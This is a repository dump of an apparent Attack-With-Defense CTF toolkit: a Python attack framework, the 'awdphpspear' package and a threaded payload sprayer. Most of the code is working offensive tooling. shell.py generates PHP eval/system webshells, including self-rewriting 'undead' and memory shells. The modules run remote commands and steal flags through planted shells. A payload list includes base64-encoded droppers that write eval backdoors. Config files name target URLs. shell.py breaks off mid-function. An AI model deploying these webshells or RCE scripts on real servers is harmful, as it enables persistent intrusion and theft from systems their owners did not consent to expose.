├── README.md
├── AWD_Auto_Attack_Framework
    ├── file_data.txt
    ├── team_token.txt
    ├── trojan.txt
    ├── flag_upload_address.txt
    ├── webshell.txt
    ├── tools.pyc
    ├── file_module.pyc
    ├── flag_module.pyc
    ├── request_module.pyc
    ├── upload_module.pyc
    ├── AWD_Auto_Attack_Framework.docx
    ├── __pycache__
    │   └── read_module.cpython-37.pyc
    ├── team_base_url_list.txt
    ├── flag.txt
    ├── file_module.py
    ├── main.py
    ├── upload_module.py
    ├── flag_module.py
    ├── request_module.py
    └── tools.py
├── image
    ├── False_Mst.png
    └── True_Mst.png
├── awdphpspear
    ├── files.pyc
    ├── shell.pyc
    ├── tools.pyc
    ├── __init__.pyc
    ├── attack.pyc
    ├── protect.pyc
    ├── request.pyc
    ├── upload.pyc
    ├── awdphpspear_readme.docx
    ├── awdphpspear_readme_latest.docx
    ├── __pycache__
    │   └── __init__.cpython-36.pyc
    ├── __init__.py
    ├── LICENSE
    ├── setup.py
    ├── attack.py
    ├── request.py
    ├── files.py
    ├── shell.py
    ├── upload.py
    ├── tools.py
    └── protect.py
├── AWD_Auto_Defend_Framework
    ├── AWD_Auto_Defend_Framework.docx
    ├── log.php
    └── File_Protect.py
├── LICENSE
└── Extend_Module
    └── Confuse.py


/README.md:
--------------------------------------------------------------------------------
1 | # 项目重构中...
2 | 


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/file_data.txt:
--------------------------------------------------------------------------------
1 | hello


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/team_token.txt:
--------------------------------------------------------------------------------
1 | team1


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/trojan.txt:
--------------------------------------------------------------------------------
1 | config.php
2 | config.php
3 | config.php


--------------------------------------------------------------------------------
/image/False_Mst.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/image/False_Mst.png


--------------------------------------------------------------------------------
/image/True_Mst.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/image/True_Mst.png


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/flag_upload_address.txt:
--------------------------------------------------------------------------------
1 | http://119.23.243.154:8080/flag_file.php


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/webshell.txt:
--------------------------------------------------------------------------------
1 | 1566055648.php
2 | 1566055752.php
3 | 1566055798.php


--------------------------------------------------------------------------------
/awdphpspear/files.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/files.pyc


--------------------------------------------------------------------------------
/awdphpspear/shell.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/shell.pyc


--------------------------------------------------------------------------------
/awdphpspear/tools.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/tools.pyc


--------------------------------------------------------------------------------
/awdphpspear/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/__init__.pyc


--------------------------------------------------------------------------------
/awdphpspear/attack.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/attack.pyc


--------------------------------------------------------------------------------
/awdphpspear/protect.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/protect.pyc


--------------------------------------------------------------------------------
/awdphpspear/request.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/request.pyc


--------------------------------------------------------------------------------
/awdphpspear/upload.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/upload.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/tools.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/tools.pyc


--------------------------------------------------------------------------------
/awdphpspear/awdphpspear_readme.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/awdphpspear_readme.docx


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/file_module.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/file_module.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/flag_module.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/flag_module.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/request_module.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/request_module.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/upload_module.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/upload_module.pyc


--------------------------------------------------------------------------------
/awdphpspear/awdphpspear_readme_latest.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/awdphpspear_readme_latest.docx


--------------------------------------------------------------------------------
/awdphpspear/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/awdphpspear/__pycache__/__init__.cpython-36.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/AWD_Auto_Attack_Framework.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/AWD_Auto_Attack_Framework.docx


--------------------------------------------------------------------------------
/AWD_Auto_Defend_Framework/AWD_Auto_Defend_Framework.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Defend_Framework/AWD_Auto_Defend_Framework.docx


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/__pycache__/read_module.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZacharyZcR/AWD/HEAD/AWD_Auto_Attack_Framework/__pycache__/read_module.cpython-37.pyc


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/team_base_url_list.txt:
--------------------------------------------------------------------------------
1 | http://119.23.243.154:8801/admin/upload/
2 | http://119.23.243.154:8802/admin/upload/
3 | http://119.23.243.154:8803/admin/upload/


--------------------------------------------------------------------------------
/awdphpspear/__init__.py:
--------------------------------------------------------------------------------
1 | from files import *
2 | from request import *
3 | from shell import *
4 | from upload import *
5 | from attack import *
6 | from tools import *
7 | from protect import *


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/flag.txt:
--------------------------------------------------------------------------------
1 | 245d96560751140c32d5309e632e8556
2 | 1a97a34107f1f45f7553859adf118b8a
3 | d6ccf1fa325e5448ce46cf514f6698d1
4 | *******************************************************
5 | 
6 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2019 The Python Packaging Authority
 2 | 
 3 | Permission is hereby granted, free of charge, to any person obtaining a copy
 4 | of this software and associated documentation files (the "Software"), to deal
 5 | in the Software without restriction, including without limitation the rights
 6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 7 | copies of the Software, and to permit persons to whom the Software is
 8 | furnished to do so, subject to the following conditions:
 9 | 
10 | The above copyright notice and this permission notice shall be included in all
11 | copies or substantial portions of the Software.
12 | 
13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
19 | SOFTWARE.


--------------------------------------------------------------------------------
/awdphpspear/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2019 The Python Packaging Authority
 2 | 
 3 | Permission is hereby granted, free of charge, to any person obtaining a copy
 4 | of this software and associated documentation files (the "Software"), to deal
 5 | in the Software without restriction, including without limitation the rights
 6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 7 | copies of the Software, and to permit persons to whom the Software is
 8 | furnished to do so, subject to the following conditions:
 9 | 
10 | The above copyright notice and this permission notice shall be included in all
11 | copies or substantial portions of the Software.
12 | 
13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
19 | SOFTWARE.


--------------------------------------------------------------------------------
/awdphpspear/setup.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | 
 3 | from setuptools import setup, find_packages
 4 | 
 5 | setup(
 6 | 	name='awdphpspear',
 7 | 	version='0.0.7',
 8 | 	description=(
 9 | 		'A tools for AWD attack.'
10 | 	),
11 | 	author='ZacharyZcR',
12 | 	author_email='2903735704@qq.com',
13 | 	maintainer='Mystery Security',
14 | 	maintainer_email='zacharyzcr@hi-ourlife.com',
15 | 	license='MIT License',
16 | 	packages=find_packages(),
17 | 	platforms=["all"],
18 | 	url='https://github.com/ZacharyZcR/AWD',
19 | 	install_requires=[
20 | 		'requests',
21 | 	],
22 | 	classifiers=[
23 | 		'Development Status :: 4 - Beta',
24 | 		'Operating System :: OS Independent',
25 | 		'Intended Audience :: Developers',
26 | 		'License :: OSI Approved :: BSD License',
27 | 		'Programming Language :: Python',
28 | 		'Programming Language :: Python :: Implementation',
29 | 		'Programming Language :: Python :: 2',
30 | 		'Programming Language :: Python :: 2.7',
31 | 		'Programming Language :: Python :: 3',
32 | 		'Programming Language :: Python :: 3.4',
33 | 		'Programming Language :: Python :: 3.5',
34 | 		'Programming Language :: Python :: 3.6',
35 | 		'Topic :: Software Development :: Libraries'
36 | 	],
37 | )


--------------------------------------------------------------------------------
/awdphpspear/attack.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import random
 3 | 
 4 | def confuse(ip = [],php_list = []):
 5 | 	print "*******************************************************"
 6 | 	payloads = ['system("cat /flag");', 'a=system&b=cat /flag', 'a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};', 'a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};', 'a=assert&b=${fputs(fopen(c.php,w),<?php @eval($_POST[b47a1654c768fa46845e9822c33d5fe9]); ?>1)};', '%73%79%73%74%65%6d%28%22%63%61%74%20%2f%66%6c%61%67%22%29%3b', 'system%28%22cat%20%2fflag%22%29%3b','getflag','"cat /flag;"','echo file_get_contents("/flag");','var_dump(file_get_contents("/flag"));','give_me_flag()']
 7 | 	for i in range(len(ip)):
 8 | 		for j in range(len(php_list)):
 9 | 			payload = payloads[random.randint(0,len(payloads)-1)]
10 | 			method = random.randint(1,2)
11 | 			if method == 1:
12 | 				data = {'cmd':payload}
13 | 				try:
14 | 					
15 | 					r = requests.get(ip[i]+'/'+php_list[j],params=data)
16 | 				except:
17 | 					print ip[i]+'/'+php_list[j]
18 | 					print 'Confuse failed.'
19 | 			if method == 2:
20 | 				data = {'cmd':payload}
21 | 				try:
22 | 					print ip[i]+'/'+php_list[j]
23 | 					r = requests.post(ip[i]+'/'+php_list[j],data=data)
24 | 					print 'Confused.'
25 | 				except:
26 | 					print 'Confuse failed.'
27 | 		print ip[i],'Confused.'
28 | 		print "*******************************************************"
29 | 


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/file_module.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | def read_txt_array(target_file):
 4 | 	try:
 5 | 		target_array = []
 6 | 		line_count = 0
 7 | 		config_file=open(target_file)
 8 | 		for line in config_file:
 9 | 			line=line.strip('\r\n')
10 | 			target_array.append(line)
11 | 			print (line)
12 | 			line_count += 1
13 | 		print "Total line:",line_count
14 | 		print "File Read Succeed."
15 | 		print "*******************************************************"
16 | 		return target_array
17 | 		config_file.close()
18 | 	except:
19 | 		print "File Read Failed."
20 | 		print "*******************************************************"
21 | 
22 | def read_txt_variable(target_file):
23 | 	try:
24 | 		config_file=open(target_file)
25 | 		target_variable = config_file.readline()
26 | 		target_variable = target_variable.strip('\r\n')
27 | 		print "*",target_variable,"*"
28 | 		print "File Read Succeed."
29 | 		print "*******************************************************"
30 | 		config_file.close()
31 | 		return target_variable
32 | 	except:
33 | 		print "File Read Failed."
34 | 		print "*******************************************************"
35 | 		
36 | def write_txt(target_file,content):
37 | 	try:
38 | 		config_file = open(target_file,"a")
39 | 		config_file.write(content)
40 | 		config_file.write("\r\n")
41 | 		config_file.close()
42 | 		print "File Write Succeed."
43 | 		print "*******************************************************"
44 | 	except:
45 | 		print "File Write Failed."
46 | 		print "*******************************************************"


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/main.py:
--------------------------------------------------------------------------------
 1 | import tools
 2 | import time
 3 | 
 4 | print "*******************************************************"
 5 | print "**************AWD_Auto_Attack_Framework****************"
 6 | print "*******************************************************"
 7 | print "**************Press_Enter_To_Initialization************"
 8 | print "*******************************************************"
 9 | enter = raw_input()
10 | tools.flag_upload_address()
11 | tools.team_token()
12 | tools.team_base_url_list()
13 | tools.webshell_url()
14 | tools.trojan_url()
15 | tools.living_check()
16 | print "**************************Initialization_Complete**************************"
17 | time.sleep(2)
18 | while (1):
19 | 	print "*******************************************************"
20 | 	print "1.Implant Trojan."
21 | 	print "2.Implant File."
22 | 	print "3.Get flag."
23 | 	print "4.Store flag."
24 | 	print "5.Get Score."
25 | 	print "6.Singe Rce."
26 | 	print "7.Multi Rce."
27 | 	print "8.Confirm Config."
28 | 	print "9.Monitor Trojan."
29 | 	print "*******************************************************"
30 | 	choose = int(raw_input("Please Input:"))
31 | 	if choose == 1:
32 | 		tools.trojan_implant()
33 | 		tools.living_check()
34 | 	if choose == 2:
35 | 		tools.file_implant()
36 | 	if choose == 3:
37 | 		tools.catch_flag()
38 | 	if choose == 4:
39 | 		tools.store_flag()
40 | 	if choose == 5:
41 | 		tools.upload_flag()
42 | 	if choose == 6:
43 | 		tools.remote_command()
44 | 	if choose == 7:
45 | 		tools.remote_command_multi()
46 | 	if choose == 8:
47 | 		tools.confirm()
48 | 	if choose == 9:
49 | 		tools.living_check()
50 | 	 


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/upload_module.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def implant(address,webshell,trojan,data):
 4 | 	try:
 5 | 		r = requests.get(address+webshell)
 6 | 		print address,"Webshell Works Well."
 7 | 	except:
 8 | 		print address,"Webshell Failed"
 9 | 	try:	
10 | 		r = requests.post(address+webshell,data=data,timeout=1)
11 | 		if r.status_code == 200:
12 | 			r = requests.get(address+trojan)
13 | 			if r.status_code == 200:
14 | 				print "Implant Succeed."
15 | 				print "*******************************************************"
16 | 	except:
17 | 		r = requests.get(address+trojan)
18 | 		if r.status_code == 200:
19 | 			print "Implant Succeed."
20 | 			print "Trojan Content:",r.text
21 | 			print "*******************************************************" 
22 | 		else:
23 | 			print "Implant Failed."
24 | 			print "*******************************************************" 
25 | 		
26 | def connect(address,data):
27 | 	try:
28 | 		r = requests.get(address,data=data)
29 | 		print "Succeed."
30 | 		print "Status_code:",r.status_code
31 | 		print "Content:",r.text
32 | 		print "*******************************************************" 
33 | 	except:
34 | 		print "Failed."
35 | 		print "*******************************************************"
36 | 
37 | def check(address):
38 | 	try:
39 | 		r =requests.get(address)
40 | 		if r.status_code == 200 :
41 | 			print address,"Living."
42 | 			print "*******************************************************" 
43 | 			return 1
44 | 		else:
45 | 			print address,"Dead."
46 | 			print "*******************************************************"
47 | 			return 0
48 | 	except:
49 | 		print address,"Dead."
50 | 		print "*******************************************************"
51 | 		return 0


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/flag_module.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def get_flag(address):
 4 | 	try:
 5 | 		data = {'b':'cat /flag'}
 6 | 		r = requests.post(address,data=data)
 7 | 		if (r.text != ''):
 8 | 			print "Get Flag Succeed."
 9 | 			print "Flag:",r.text
10 | 			print "*******************************************************" 
11 | 		else:
12 | 			print "Get Flag Failed."
13 | 			print "*******************************************************" 
14 | 	except:
15 | 		print "Get Flag Failed."
16 | 		print "*******************************************************" 
17 | 		
18 | def get_store_flag(address):
19 | 	try:
20 | 		data = {'b':'cat /flag'}
21 | 		r = requests.post(address,data=data)
22 | 		if (r.text != ''):
23 | 			print "Get Flag Succeed."
24 | 			return r.text
25 | 		if (r.text == ''):
26 | 			print "Get Flag Failed."
27 | 			return "NULL"
28 | 			print "*******************************************************" 
29 | 		else:
30 | 			print "Get Flag Failed."
31 | 			print "*******************************************************" 
32 | 	except:
33 | 		print "Get Flag Failed."
34 | 		print "*******************************************************" 
35 | 		
36 | def rce(address):
37 | 	try:
38 | 		command = raw_input("Command(Input stop To Exit.):")
39 | 		if command == 'stop':
40 | 			return 1
41 | 			exit()
42 | 		data = {'b':command}
43 | 		r = requests.post(address,data=data)
44 | 		print r.text
45 | 		print "*******************************************************" 
46 | 	except:
47 | 		print "Rce Failed."
48 | 
49 | def rce_multi(address,command):
50 | 	try:
51 | 		data = {'b':command}
52 | 		r = requests.post(address,data=data)
53 | 		if r.text != '':
54 | 			print address,":"
55 | 			print r.text
56 | 			print "*******************************************************" 
57 | 	except:
58 | 		print "Rce Failed."


--------------------------------------------------------------------------------
/Extend_Module/Confuse.py:
--------------------------------------------------------------------------------
 1 | # -*-coding:utf-8
 2 | # By Virtua1
 3 | 
 4 | import requests
 5 | import random
 6 | import re
 7 | import os
 8 | import threading
 9 | 
10 | def get_path():
11 | 	php_list=[]
12 | 	for root,dirs,files in os.walk('./'):
13 | 		for f in files:
14 | 			if f[-4:] == '.php':
15 | 				tmp = (root+"/"+f).replace('\\','/')
16 | 				tmp = tmp.replace('//','/')
17 | 				php_list.append(tmp)
18 | 	return php_list
19 | 
20 | 
21 | def rand_payload():
22 | 	payloads = ['system("cat /flag");', 'a=system&b=cat /flag', 'a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};', 'a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};', 'a=assert&b=${fputs(fopen(c.php,w),<?php @eval($_POST[b47a1654c768fa46845e9822c33d5fe9]); ?>1)};', '%73%79%73%74%65%6d%28%22%63%61%74%20%2f%66%6c%61%67%22%29%3b', 'system%28%22cat%20%2fflag%22%29%3b','getflag','"cat /flag;"','echo file_get_contents("/flag");','var_dump(file_get_contents("/flag"));','give_me_flag()']
23 | 	payload = payloads[random.randint(0,len(payloads)-1)]
24 | 	return payload
25 | 
26 | php_list=get_path()
27 | def fake_request(ip):
28 | 	global php_list
29 | 	path = php_list[random.randint(0,len(php_list))-1][1:]
30 | 	payload = rand_payload()
31 | 	num = random.randint(1,2)
32 | 	if num == 1:
33 | 		url = 'http://'+ip+path+'/?pass='+payload
34 | 		try:
35 | 			resp = requests.get(url)
36 | 		except:
37 | 			pass
38 | 
39 | 	if num == 2:
40 | 		data = {
41 | 				'cmd': payload
42 | 		}
43 | 		url = 'http//'+ip+path+'/'
44 | 		try:
45 | 			resp = requests.post(url,data=data)
46 | 		except:
47 | 			pass
48 | 
49 | 
50 | ips = open('ip.txt','r').readlines()
51 | for ip in ips:
52 | 	send = threading.Thread(target=fake_request,args=[ip])
53 | 	send.start()
54 | 
55 | 
56 | 
57 | 
58 | 
59 | 
60 | 
61 | 
62 | 
63 | 


--------------------------------------------------------------------------------
/AWD_Auto_Attack_Framework/request_module.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def get(address,data):
 4 | 	try:
 5 | 		r = requests.get(address,params=data)
 6 | 		print "Target:",r.url
 7 | 		print "Succeed."
 8 | 		print "*******************************************************"
 9 | 	except:
10 | 		print "Failed."
11 | 		print "*******************************************************"
12 | 		
13 | def post(address,data):
14 | 	try:
15 | 		r = requests.post(address,data=data)
16 | 		print "Target:",r.url
17 | 		print "Post data:",data
18 | 		print "Succeed."
19 | 		print "*******************************************************"
20 | 	except:
21 | 		print "Failed."
22 | 		print "*******************************************************"
23 | 		
24 | def xwf(address,data):
25 | 	try:
26 | 		headers = {'Content-Type':'application/x-www-form-urlencoded'}
27 | 		r = requests.post(address,data=data)
28 | 		print "Target:",r.url
29 | 		print "Post data:",data
30 | 		print "Succeed."
31 | 		print "*******************************************************"
32 | 	except:
33 | 		print "Failed."
34 | 		print "*******************************************************"
35 | 
36 | def json(address,data):
37 | 	try:
38 | 		headers = {'Content-Type':'application/json'}
39 | 		r = requests.post(address,data=data)
40 | 		print "Target:",r.url
41 | 		print "Post data:",data
42 | 		print "Succeed."
43 | 		print "*******************************************************"
44 | 	except:
45 | 		print "Failed."
46 | 		print "*******************************************************"
47 | 		
48 | def test(address):
49 | 	try:
50 | 		r = requests.get(address)
51 | 		print "Target:",r.url
52 | 		print r.status_code
53 | 		if r.status_code == 200:
54 | 			print "Test Succeed"
55 | 		print "*******************************************************"
56 | 	except:
57 | 		print "Test Failed."
58 | 		print "*******************************************************"


--------------------------------------------------------------------------------
/awdphpspear/request.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def get(address,data):
 4 | 	print "*******************************************************"
 5 | 	try:
 6 | 		r = requests.get(address,params=data)
 7 | 		print "Target:",r.url
 8 | 		print "Succeed."
 9 | 		print "Content:",r.text
10 | 		print "*******************************************************"
11 | 	except:
12 | 		print "Failed."
13 | 		print "*******************************************************"
14 | 		
15 | def post(address,data):
16 | 	print "*******************************************************"
17 | 	try:
18 | 		r = requests.post(address,data=data)
19 | 		print "Target:",r.url
20 | 		print "Post data:",data
21 | 		print "Succeed."
22 | 		print "Content:",r.text
23 | 		print "*******************************************************"
24 | 	except:
25 | 		print "Failed."
26 | 		print "*******************************************************"
27 | 		
28 | def post_xwf(address,data):
29 | 	print "*******************************************************"
30 | 	try:
31 | 		headers = {'Content-Type':'application/x-www-form-urlencoded'}
32 | 		r = requests.post(address,data=data)
33 | 		print "Target:",r.url
34 | 		print "Post data:",data
35 | 		print "Succeed."
36 | 		print "Content:",r.text
37 | 		print "*******************************************************"
38 | 	except:
39 | 		print "Failed."
40 | 		print "*******************************************************"
41 | 
42 | def post_json(address,data):
43 | 	print "*******************************************************"
44 | 	try:
45 | 		headers = {'Content-Type':'application/json'}
46 | 		r = requests.post(address,data=data)
47 | 		print "Target:",r.url
48 | 		print "Post data:",data
49 | 		print "Succeed."
50 | 		print "Content:",r.text
51 | 		print "*******************************************************"
52 | 	except:
53 | 		print "Failed."
54 | 		print "*******************************************************"
55 | 		
56 | def test(address):
57 | 	print "*******************************************************"
58 | 	try:
59 | 		r = requests.get(address)
60 | 		print "Target:",r.url
61 | 		print r.status_code
62 | 		if r.status_code == 200:
63 | 			print "Test Succeed"
64 | 		print "*******************************************************"
65 | 	except:
66 | 		print "Test Failed."
67 | 		print "*******************************************************"


--------------------------------------------------------------------------------
/awdphpspear/files.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | def read_array(target_file):
 4 | 	print "*******************************************************"
 5 | 	try:
 6 | 		target_array = []
 7 | 		line_count = 0
 8 | 		config_file=open(target_file)
 9 | 		for line in config_file:
10 | 			line=line.strip('\r\n')
11 | 			target_array.append(line)
12 | 			print (line)
13 | 			line_count += 1
14 | 		print "[+]Total line:",line_count
15 | 		print "[+]File Read Succeed."
16 | 		print "*******************************************************"
17 | 		return target_array
18 | 		config_file.close()
19 | 	except:
20 | 		print "[-]File Read Failed."
21 | 		print "*******************************************************"
22 | 
23 | def read_var(target_file):
24 | 	print "*******************************************************"
25 | 	try:
26 | 		config_file=open(target_file)
27 | 		target_variable = config_file.readline()
28 | 		target_variable = target_variable.strip('\r\n')
29 | 		print "*",target_variable,"*"
30 | 		print "[+]File Read Succeed."
31 | 		print "*******************************************************"
32 | 		config_file.close()
33 | 		return target_variable
34 | 	except:
35 | 		print "[-]File Read Failed."
36 | 		print "*******************************************************"
37 | 		
38 | def write_txt(target_file,content):
39 | 	print "*******************************************************"
40 | 	if content != None:
41 | 		try:
42 | 			config_file = open(target_file,"a")
43 | 			config_file.write(content)
44 | 			config_file.write("\r\n")
45 | 			config_file.close()
46 | 			print "[+]File Write Succeed."
47 | 			print "*******************************************************"
48 | 		except:
49 | 			print "[-]File Write Failed."
50 | 			print "*******************************************************"
51 | 	else:
52 | 		print "[-]Content is None."
53 | 		print "*******************************************************"
54 | 		
55 | def dir_tree(startpath):
56 | 	for root,dirs,files in os.walk(startpath,topdown=True):
57 | 		level = root.replace(startpath,'').count(os.sep)
58 | 		dir_indent = "|---" * (level-1) + "|---"
59 | 		file_indent = "|---" * level + "|---"
60 | 		if not level:
61 | 			print root.replace(startpath,'')
62 | 		else:
63 | 			print dir_indent+os.path.basename(root)
64 | 		for f in files:
65 | 			print file_indent+f
66 | 			
67 | def get_php_list(startpath):
68 | 	php_list=[]
69 | 	for root,dirs,files in os.walk(startpath,topdown=True):
70 | 		for f in files:
71 | 			if f[-4:] == '.php':
72 | 				root = root.replace('./','')
73 | 				php_list.append(root+'/'+f)
74 | 	for i in range(len(php_list)):
75 | 		print php_list[i]
76 | 	return php_list


--------------------------------------------------------------------------------
/awdphpspear/shell.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import os
  3 | 
  4 | def shell_gen():
  5 | 	choose = raw_input('[+]1.Normal Shell.2.Undead Shell.3.Memory Shell.')
  6 | 	if choose == '1':
  7 | 		try:
  8 | 			payload = '<?php '
  9 | 			payload += '@eval($_POST[a]);@system($_POST[b]);'
 10 | 			payload += '?>'
 11 | 			file = open('shell.php',"a")
 12 | 			file.write(payload)
 13 | 			file.close()
 14 | 			print "[+]Succeed."
 15 | 		except:
 16 | 			print "[-]Failed."
 17 | 	if choose == '2':
 18 | 		try:
 19 | 			payload = '<?php '
 20 | 			payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
 21 | 			payload += "'"
 22 | 			payload += "shell.php"
 23 | 			payload += "'"
 24 | 			payload += ';$code='
 25 | 			payload += "'"
 26 | 			payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
 27 | 			payload += "'"
 28 | 			payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
 29 | 			payload += '?>'
 30 | 			file = open('shell.php',"a")
 31 | 			file.write(payload)
 32 | 			file.close()
 33 | 			print "[+]Succeed."
 34 | 		except:
 35 | 			print "[-]Failed."
 36 | 	if choose == '3':
 37 | 		try:
 38 | 			payload = '<?php '
 39 | 			payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
 40 | 			payload += ''
 41 | 			payload += 'while(1){php @eval($_POST[a]);@system($_POST[b]);usleep(5000);}'
 42 | 			payload += '?>'
 43 | 			file = open('shell.php',"a")
 44 | 			file.write(payload)
 45 | 			file.close()
 46 | 			print "[+]Succeed."
 47 | 		except:
 48 | 			print "[-]Failed."
 49 | 			
 50 | def rce(address,password,method):
 51 | 	while 1:
 52 | 		command = raw_input('Command(Input stop to exit):')
 53 | 		if command == 'stop':
 54 | 			break
 55 | 		if method == 'get':
 56 | 			print "*******************************************************" 
 57 | 			try:
 58 | 				data = {password:"system('"+command+"');"}
 59 | 				r = requests.get(address,params=data)
 60 | 				if r.text != '':
 61 | 					print address,":"
 62 | 					print r.text
 63 | 					print "*******************************************************" 
 64 | 			except:
 65 | 				print "[-]Rce Failed."
 66 | 				print "*******************************************************" 
 67 | 		if method == 'post':
 68 | 			print "*******************************************************" 
 69 | 			try:
 70 | 				data = {password:"system('"+command+"');"}
 71 | 				r = requests.post(address,data=data)
 72 | 				if r.text != '':
 73 | 					print address,":"
 74 | 					print r.text
 75 | 					print "*******************************************************" 
 76 | 			except:
 77 | 				print "[-]Rce Failed."
 78 | 				print "*******************************************************"
 79 | 
 80 | def batch_rce(address,password,method,command):
 81 | 	if method == 'get':
 82 | 		print "*******************************************************" 
 83 | 		try:
 84 | 			data = {password:"system('"+command+"');"}
 85 | 			r = requests.get(address,params=data)
 86 | 			if r.text != '':
 87 | 				print address,":"
 88 | 				print r.text
 89 | 				print "*******************************************************" 
 90 | 		except:
 91 | 			print "[-]Rce Failed."
 92 | 			print "*******************************************************" 
 93 | 	if method == 'post':
 94 | 		print "*******************************************************" 
